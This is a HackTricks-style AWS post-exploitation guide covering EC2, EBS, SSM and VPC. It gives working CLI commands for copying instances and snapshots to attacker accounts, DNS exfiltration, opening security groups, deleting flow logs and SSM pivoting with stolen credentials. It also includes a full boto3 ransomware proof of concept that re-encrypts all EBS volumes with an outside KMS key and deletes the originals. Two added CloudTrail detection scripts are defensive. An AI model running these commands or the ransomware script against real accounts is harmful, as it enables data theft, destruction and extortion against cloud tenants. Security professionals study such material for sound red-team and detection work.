AWS - EC2, EBS, SSM & VPC Post Exploitation
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
EC2 & VPC
For more information check:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
Malicious VPC Mirror - ec2:DescribeInstances, ec2:RunInstances, ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress, ec2:CreateTrafficMirrorTarget, ec2:CreateTrafficMirrorSession, ec2:CreateTrafficMirrorFilter, ec2:CreateTrafficMirrorFilterRule
VPC traffic mirroring duplicates the inbound and outbound traffic of EC2 instances inside a VPC without needing to install anything on the instances themselves. This duplicated traffic is normally sent to something like a network intrusion detection system (IDS) for analysis and monitoring.
An attacker could abuse this to capture all the traffic and obtain sensitive information from it:
For more information check this page:
Copy Running Instance
Instances usually contain some kind of sensitive information. There are different ways to get inside (check the EC2 privilege escalation tricks). However, another way to check what an instance contains is to create an AMI from it and run a new instance (even in your own account) from that AMI:
# List instances (describe-instances lists the running instances and their ids)
aws ec2 describe-instances
# create a new image for the instance-id
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1
# add key to AWS
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1
# create ec2 using the previously created AMI (wait until the AMI is "available" before launching),
# use the same security group and subnet to connect easily.
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
# now you can check the instance
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1
# If needed : edit groups
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1
# be a good guy, clean our instance to avoid any useless cost (the flag is --instance-ids, plural)
aws ec2 stop-instances --instance-ids "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-ids "i-0546910a0c18725a1" --region eu-west-1
EBS Snapshot dump
Snapshots are backups of volumes, which will usually contain sensitive information, so checking them should reveal that information.
If you find a volume without a snapshot you can: create a snapshot and perform the following actions, or just mount it in an instance inside the account:
Data Exfiltration
DNS Exfiltration
Even if you lock down an EC2 so that no traffic can get out, data can still be exfiltrated via DNS.
- VPC Flow Logs won't record this.
- You don't have access to AWS DNS logs.
- Disable this by setting "enableDnsSupport" to false with:
aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>
Exfiltration via API calls
An attacker could call API endpoints of an account they control. CloudTrail will log these calls and the attacker will be able to see the exfiltrated data in their CloudTrail logs.
Open Security Group
You can get further access to network services by opening ports like this:
aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
# Or you could just open it to more specific ips or maybe the internal network if you have already compromised an EC2 in the VPC
Privesc to ECS
It's possible to run an EC2 instance and register it to be used to run ECS instances, and then steal the data of the ECS instances.
For more information check this.
Remove VPC flow logs
aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>
SSM Port Forwarding
Required permissions:
ssm:StartSession
Apart from command execution, SSM allows tunneling traffic, which can be used to pivot from EC2 instances that have no network access because of Security Groups or NACLs. One of the scenarios where this is useful is pivoting from a Bastion Host to a private EKS cluster.
To start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
- Install SessionManagerPlugin on your machine
- Log in to the Bastion EC2 using the following command:
aws ssm start-session --target "$INSTANCE_ID"
- Get the Bastion EC2's temporary AWS credentials using the Abusing SSRF in AWS EC2 environment script
- Transfer those credentials to your own machine, into the $HOME/.aws/credentials file as the [bastion-ec2] profile
- Log in to EKS as the Bastion EC2:
aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>
- Update the server field in the $HOME/.kube/config file to point to https://localhost
- Create the SSM tunnel as follows:
sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>
- Traffic from the kubectl tool is now forwarded through the SSM tunnel via the Bastion EC2, and you can access the private EKS cluster from your own machine by running:
kubectl get pods --insecure-skip-tls-verify
Note that the SSL connection will fail unless you set the --insecure-skip-tls-verify flag (or its equivalent in K8s audit tools). Since the traffic is routed through the secure AWS SSM tunnel, you are safe from any kind of MitM attack.
Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domain names and ports to pivot to any other AWS service or custom application.
Share AMI
aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
Search for sensitive information in public & private AMIs
- https://github.com/saw-your-packet/CloudShovel: CloudShovel is a tool designed to search for sensitive information inside public or private Amazon Machine Images (AMIs). It automates the process of launching instances from the target AMIs, mounting their volumes, and scanning them for any secrets or sensitive data that may be present.
Share EBS Snapshot
aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
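As an added detection example (not part of the original page), the following Python classifies CloudTrail records for the actions covered above: traffic mirroring, ingress rules opened to 0.0.0.0/0, deleted flow logs, and AMIs or snapshots shared with another account or made public. The records are constructed samples; the requestParameters layout (items lists, launchPermission / createVolumePermission) is assumed to match CloudTrail's EC2 event format.

```python
MIRROR_CALLS = {"CreateTrafficMirrorTarget", "CreateTrafficMirrorSession",
                "CreateTrafficMirrorFilter", "CreateTrafficMirrorFilterRule"}

def _external_principals(block, own_account):
    # Accounts (or "public") added by a launchPermission / createVolumePermission change
    found = []
    for item in block.get("add", {}).get("items", []):
        if item.get("group") == "all":
            found.append("public")
        elif item.get("userId") and item["userId"] != own_account:
            found.append(item["userId"])
    return found

def _world_open_ranges(params):
    # protocol/port ranges of an ingress rule that are open to 0.0.0.0/0
    return [f"{p.get('ipProtocol')}/{p.get('fromPort')}-{p.get('toPort')}"
            for p in params.get("ipPermissions", {}).get("items", [])
            for r in p.get("ipRanges", {}).get("items", []) if r.get("cidrIp") == "0.0.0.0/0"]

def classify(event):
    """Finding label for one CloudTrail record, or None if nothing matched."""
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    own = event.get("recipientAccountId")
    if name in MIRROR_CALLS:
        return f"traffic-mirroring: {name}"
    if name == "DeleteFlowLogs":
        return "flow-logs-deleted"
    if name == "AuthorizeSecurityGroupIngress":
        hits = _world_open_ranges(params)
        return "sg-open-to-world: " + ",".join(hits) if hits else None
    if name == "ModifyImageAttribute":
        hits = _external_principals(params.get("launchPermission", {}), own)
        return "ami-shared-externally: " + ",".join(hits) if hits else None
    if name == "ModifySnapshotAttribute":
        hits = _external_principals(params.get("createVolumePermission", {}), own)
        return "snapshot-shared-externally: " + ",".join(hits) if hits else None
    return None

def scan(events):
    return [(e["eventName"], classify(e)) for e in events if classify(e)]

# Constructed sample records (not real CloudTrail data); the audited account is 111111111111.
OWN = "111111111111"
SAMPLE_EVENTS = [
    {"eventName": "CreateTrafficMirrorSession", "recipientAccountId": OWN, "requestParameters": {}},
    {"eventName": "AuthorizeSecurityGroupIngress", "recipientAccountId": OWN, "requestParameters": {
        "ipPermissions": {"items": [{"ipProtocol": "tcp", "fromPort": 80, "toPort": 80,
                                     "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventName": "DeleteFlowLogs", "recipientAccountId": OWN, "requestParameters": {}},
    {"eventName": "ModifyImageAttribute", "recipientAccountId": OWN, "requestParameters": {
        "launchPermission": {"add": {"items": [{"userId": "999999999999"}]}}}},
    {"eventName": "ModifySnapshotAttribute", "recipientAccountId": OWN,  # same account: benign
     "requestParameters": {"createVolumePermission": {"add": {"items": [{"userId": OWN}]}}}},
]
```

Sharing with the account's own ID is left unflagged on purpose, so the last sample record produces no finding.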
EBS Ransomware PoC
A proof of concept similar to the Ransomware demonstration shown in the S3 post-exploitation notes. KMS should be renamed to RMS, for Ransomware Management Service, given how easy it is to use it to encrypt various AWS services.
First, from the 'attacker' AWS account, create a customer managed key in KMS. For this example we'll let AWS manage the key material, but in a real-world scenario a malicious actor would keep the key material outside of AWS's control. Change the key policy to allow every AWS account principal to use the key. For this key policy, the account name was 'AttackSim' and the policy rule that allows all access is called 'Outside Encryption'
{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Allow access for Key Administrators",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Create*",
        "kms:Describe*",
        "kms:Enable*",
        "kms:List*",
        "kms:Put*",
        "kms:Update*",
        "kms:Revoke*",
        "kms:Disable*",
        "kms:Get*",
        "kms:Delete*",
        "kms:TagResource",
        "kms:UntagResource",
        "kms:ScheduleKeyDeletion",
        "kms:CancelKeyDeletion"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow use of the key",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Encrypt",
        "kms:Decrypt",
        "kms:ReEncrypt*",
        "kms:GenerateDataKey*",
        "kms:DescribeKey"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Outside Encryption",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "kms:Encrypt",
        "kms:Decrypt",
        "kms:ReEncrypt*",
        "kms:GenerateDataKey*",
        "kms:DescribeKey",
        "kms:GenerateDataKeyWithoutPlainText",
        "kms:CreateGrant"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow attachment of persistent resources",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:CreateGrant",
        "kms:ListGrants",
        "kms:RevokeGrant"
      ],
      "Resource": "*",
      "Condition": {
        "Bool": {
          "kms:GrantIsForAWSResource": "true"
        }
      }
    }
  ]
}
The key policy needs the following actions allowed in order for the key to be usable for encrypting an EBS volume:
- kms:CreateGrant
- kms:Decrypt
- kms:DescribeKey
- kms:GenerateDataKeyWithoutPlainText
- kms:ReEncrypt
Now we have a publicly usable key. We can use a 'victim' account that has several EC2 instances running with unencrypted EBS volumes attached. The EBS volumes of this 'victim' account are the ones targeted for encryption; this attack assumes a compromise of a highly privileged AWS account.
Like the S3 ransomware example, this attack will make copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and finally delete the snapshots that were used to create the newly encrypted EBS volumes.
This leaves only the encrypted EBS volumes in the account.
It is also worth mentioning that the script stopped the EC2 instances in order to detach and delete the original EBS volumes. The original unencrypted EBS volumes are now gone.
Next, go back to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy.
{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Allow access for Key Administrators",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Create*",
        "kms:Describe*",
        "kms:Enable*",
        "kms:List*",
        "kms:Put*",
        "kms:Update*",
        "kms:Revoke*",
        "kms:Disable*",
        "kms:Get*",
        "kms:Delete*",
        "kms:TagResource",
        "kms:UntagResource",
        "kms:ScheduleKeyDeletion",
        "kms:CancelKeyDeletion"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow use of the key",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": [
        "kms:Encrypt",
        "kms:Decrypt",
        "kms:ReEncrypt*",
        "kms:GenerateDataKey*",
        "kms:DescribeKey"
      ],
      "Resource": "*"
    },
    {
      "Sid": "Allow attachment of persistent resources",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
      },
      "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
      "Resource": "*",
      "Condition": {
        "Bool": {
          "kms:GrantIsForAWSResource": "true"
        }
      }
    }
  ]
}
Wait a moment for the new key policy to propagate. Then go back to the 'victim' account and try to attach one of the newly encrypted EBS volumes. You will find that you can attach the volume.
But when you then try to start the EC2 instance with the encrypted EBS volume attached, it will simply fail and go from the 'pending' state back to the 'stopped' state forever, since the attached EBS volume can no longer be decrypted with the key: the key policy no longer allows it.
This is the python script that was used. It takes AWS creds for the 'victim' account and the publicly available AWS ARN value of the key to be used for encryption. The script makes encrypted copies of ALL the available EBS volumes attached to ALL the EC2 instances in the targeted AWS account, then stops every EC2 instance, detaches the original EBS volumes, deletes them, and finally deletes all the snapshots used during the process. This leaves only the encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the KMS key that was used and restore them to their previous state through snapshots, but I want you to be aware that this is a ransomware PoC at the end of the day.
import boto3
import argparse
from botocore.exceptions import ClientError


def enumerate_ec2_instances(ec2_client):
    # Map every instance id in the region to the EBS volume ids attached to it
    instances = ec2_client.describe_instances()
    instance_volumes = {}
    for reservation in instances['Reservations']:
        for instance in reservation['Instances']:
            instance_id = instance['InstanceId']
            volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
            instance_volumes[instance_id] = volumes
    return instance_volumes


def snapshot_volumes(ec2_client, volumes):
    snapshot_ids = []
    for volume_id in volumes:
        snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
        snapshot_ids.append(snapshot['SnapshotId'])
    return snapshot_ids


def wait_for_snapshots(ec2_client, snapshot_ids):
    for snapshot_id in snapshot_ids:
        ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])


def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
    # Each new volume is created in the AZ of the original volume, encrypted with the attacker's key
    new_volume_ids = []
    for snapshot_id in snapshot_ids:
        snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
        volume_id = snapshot_info['VolumeId']
        volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
        availability_zone = volume_info['AvailabilityZone']
        volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
                                          Encrypted=True, KmsKeyId=kms_key_arn)
        new_volume_ids.append(volume['VolumeId'])
    return new_volume_ids


def stop_instances(ec2_client, instance_ids):
    for instance_id in instance_ids:
        try:
            instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
            instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
            if instance_state == 'running':
                ec2_client.stop_instances(InstanceIds=[instance_id])
                print(f"Stopping instance: {instance_id}")
                ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
                print(f"Instance {instance_id} stopped.")
            else:
                print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
        except ClientError as e:
            print(f"Error stopping instance {instance_id}: {e}")


def detach_and_delete_volumes(ec2_client, volumes):
    for volume_id in volumes:
        try:
            ec2_client.detach_volume(VolumeId=volume_id)
            ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
            ec2_client.delete_volume(VolumeId=volume_id)
            print(f"Deleted volume: {volume_id}")
        except ClientError as e:
            print(f"Error detaching or deleting volume {volume_id}: {e}")


def delete_snapshots(ec2_client, snapshot_ids):
    for snapshot_id in snapshot_ids:
        try:
            ec2_client.delete_snapshot(SnapshotId=snapshot_id)
            print(f"Deleted snapshot: {snapshot_id}")
        except ClientError as e:
            print(f"Error deleting snapshot {snapshot_id}: {e}")


def replace_volumes(ec2_client, instance_volumes):
    # Stop every instance, then detach and delete its original (unencrypted) volumes
    instance_ids = list(instance_volumes.keys())
    stop_instances(ec2_client, instance_ids)
    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
    detach_and_delete_volumes(ec2_client, all_volumes)


def ebs_lock(access_key, secret_key, region, kms_key_arn):
    # Same flow as main(), callable from other code
    ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
    instance_volumes = enumerate_ec2_instances(ec2_client)
    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
    wait_for_snapshots(ec2_client, snapshot_ids)
    create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
    replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
    delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed


def parse_arguments():
    parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
    parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
    parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
    parser.add_argument('--region', required=True, help='AWS Region')
    parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
    return parser.parse_args()


def main():
    args = parse_arguments()
    ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
    instance_volumes = enumerate_ec2_instances(ec2_client)
    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
    wait_for_snapshots(ec2_client, snapshot_ids)
    create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
    replace_volumes(ec2_client, instance_volumes)
    delete_snapshots(ec2_client, snapshot_ids)


if __name__ == "__main__":
    main()
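An added detection example, not from the original write-up, for the victim side of the PoC above: it flags CreateVolume calls whose KMS key ARN belongs to another account and groups them with the stop/detach/delete calls the script issues from the same principal. The CloudTrail records are constructed samples, and the assumption is that requestParameters.kmsKeyId carries the key reference exactly as passed to the API (an ARN here; a bare key ID or alias gives no account and is not flagged).

```python
from datetime import datetime, timedelta

DESTRUCTIVE = {"StopInstances", "DetachVolume", "DeleteVolume", "DeleteSnapshot"}

def kms_key_account(key_ref):
    # Account ID from a KMS key ARN (arn:aws:kms:REGION:ACCOUNT:key/ID); None for bare
    # key IDs or aliases, whose owning account cannot be read from the string
    parts = key_ref.split(":")
    return parts[4] if len(parts) == 6 and parts[2] == "kms" and parts[4].isdigit() else None

def _ts(event):
    return datetime.fromisoformat(event["eventTime"].replace("Z", "+00:00"))

def foreign_key_volume_events(events, own_account):
    # CreateVolume records whose KMS key belongs to a different account
    hits = []
    for e in events:
        acct = kms_key_account((e.get("requestParameters") or {}).get("kmsKeyId", ""))
        if e["eventName"] == "CreateVolume" and acct and acct != own_account:
            hits.append(e)
    return hits

def ransomware_chains(events, own_account, window_minutes=60):
    # For each foreign-key CreateVolume, collect the destructive calls made by the same
    # principal inside the window; all four together is the pattern of the script above
    findings = []
    for cv in foreign_key_volume_events(events, own_account):
        actor, t0 = cv["userIdentity"]["arn"], _ts(cv)
        follow = {e["eventName"] for e in events
                  if e["userIdentity"]["arn"] == actor and e["eventName"] in DESTRUCTIVE
                  and timedelta(0) <= _ts(e) - t0 <= timedelta(minutes=window_minutes)}
        findings.append({"actor": actor, "key_account": kms_key_account(cv["requestParameters"]["kmsKeyId"]),
                         "followups": sorted(follow), "complete": follow == DESTRUCTIVE})
    return findings

# Constructed sample trail (not real data): victim account 111111111111, attacker key in 999999999999
OWN = "111111111111"
ACTOR = "arn:aws:iam::111111111111:user/compromised-admin"
FOREIGN_KEY = "arn:aws:kms:eu-west-1:999999999999:key/11111111-2222-3333-4444-555555555555"
OWN_KEY = "arn:aws:kms:eu-west-1:111111111111:key/aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"

def _ev(time, name, params):
    return {"eventTime": time, "eventName": name, "recipientAccountId": OWN,
            "userIdentity": {"arn": ACTOR}, "requestParameters": params}

SAMPLE_EVENTS = [
    _ev("2024-01-01T10:00:00Z", "CreateSnapshot", {"volumeId": "vol-0aaa"}),
    _ev("2024-01-01T10:05:00Z", "CreateVolume", {"snapshotId": "snap-0aaa", "kmsKeyId": FOREIGN_KEY}),
    _ev("2024-01-01T10:06:00Z", "StopInstances", {}),
    _ev("2024-01-01T10:08:00Z", "DetachVolume", {"volumeId": "vol-0aaa"}),
    _ev("2024-01-01T10:09:00Z", "DeleteVolume", {"volumeId": "vol-0aaa"}),
    _ev("2024-01-01T10:10:00Z", "DeleteSnapshot", {"snapshotId": "snap-0aaa"}),
    _ev("2024-01-01T15:00:00Z", "CreateVolume", {"kmsKeyId": OWN_KEY}),  # own key, outside window: benign
]
```

A foreign-key CreateVolume on its own is already worth an alert, since legitimate re-encryption uses a key the account owns; the "complete" flag only tells you how far the chain got.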